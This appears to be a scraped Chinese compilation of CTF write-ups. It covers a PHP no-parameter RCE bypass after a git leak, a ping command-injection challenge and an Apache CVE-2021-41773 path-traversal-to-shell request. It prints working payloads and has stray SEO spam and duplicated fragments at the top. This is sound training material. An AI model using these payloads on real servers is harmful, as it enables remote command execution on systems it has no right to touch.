温州市企业网站制作,做自媒体必备的8个网站,网站建设公司调研汇报ppt,100元建网站[GXYCTF 2019]禁止套娃
涉及知识点#xff1a;git泄露#xff0c;无参数RCE
打开环境#xff0c;源码什么的都没有#xff0c;扫描后台看看 扫描发现存在git泄露 用githack下载查看得到一串源码
?php
include flag.php;
echo flag在哪里呢#…[GXYCTF 2019]禁止套娃
涉及知识点git泄露无参数RCE
打开环境源码什么的都没有扫描后台看看 扫描发现存在git泄露 用githack下载查看得到一串源码
?php
include flag.php;
echo flag在哪里呢br;
if(isset($_GET[exp])){if (!preg_match(/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i, $_GET[exp])) {if(; preg_replace(/[a-z,_]\((?R)?\)/, NULL, $_GET[exp])) {if (!preg_match(/et|na|info|dec|bin|hex|oct|pi|log/i, $_GET[exp])) {// echo $_GET[exp];eval($_GET[exp]);}else{die(还差一点哦);}}else{die(再好好想想);}}else{die(还想读flag臭弟弟);}
}
// highlight_file(__FILE__);
?
又看见了;很明显的无参数绕过了但是还是不考虑getallheaders,因为不清楚环境条件所以一般不使用还是选择利用php函数来绕过
php的伪协议被过滤了还有一些数学函数也被过滤了就老实利用php函数来绕过了 localeconv() – 函数返回一个包含本地数字及货币格式信息的数组 第一个是. pos() – 返回数组中的当前单元, 默认取第一个值 next – 将内部指针指向数组下一个元素并输出 scandir() – 扫描目录 array_reverse() – 翻转数组 array_flip() - 键名与数组值对调 readfile() array_rand() - 随机读取键名 var_dump() - 输出数组可以用print_r替代 file_get_contents() - 读取文件内容show_source,highlight_file echo 可代替 get_defined_vars() - 返回由所有已定义变量所组成的数组 end() - 读取数组最后一个元素 current() - 读取数组的第一个元 参数是exp开始传参
expvar_dump(localeconv()); 返回当前单元也就是.下的内容
expvar_dump(pos(localeconv())); 扫描目录下内容,看见flag.php了快了
expvar_dump(scandir(pos(localeconv()))); 因为flag.php位置是倒数第二个所以采取翻转数组在改变内置指针的指向来读取flag
expvar_dump(next(array_reverse(scandir(pos(localeconv()))))); 读取flag.php这里用的是show_source命令
expvar_dump(show_source(next(array_reverse(scandir(pos(localeconv())))))); [SWPUCTF 2023 秋季新生赛]Pingpingping
源码 需要传入Ping_ip.exe的参数但是在网页传参以后_会被替换成.,所以用[替换后能正常传参Ping[ip.exe127.0.0.1” 是一个Ping命令用于测试与目标IP地址的网络连接。在这种情况下目标IP地址是本地回环地址127.0.0.1表示测试本机的网络连接。
ping-c3给了三个ping回显工具那么到这里后面进正常进行命令执行
Ping[ip.exe127.0.0.1;ls / 看见flag了cat就行 [NSSRound#4 SWPU]ez_rce
CVE-2021-41773(Apache HTTP Server路径穿越漏洞) 同时如果Apache HTTPd 开启了 cgi 支持攻击者可构造恶意请求执行命令控制服务器。
条件 配置目录遍历,并且开启cgi mode 2.Apache HTTPd版本为2.4.49/2.4.50 3.存在cgi-bin和icons文件夹而且/icons/必需是一个可以访问的文件夹 利用
抓包构造post传参传入.%2e/的形式来绕过对于路径穿越符的检测在cgi-bin服务器上执行命令执行查看目录
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
打开环境什么都没有标签说是CVE泄露在Apache环境下存在CVE-2021-41773 所以通过抓包修改传参来绕过 查看flag但是这里会发现直接查看flag_is_here没有回显一个一个尝试在run.sh里面发现线索有些wp说根据经验知道有个四层文件夹迷宫然后去爆破四层迷宫这里查看run.sh也是一样的 看见真正的位置了
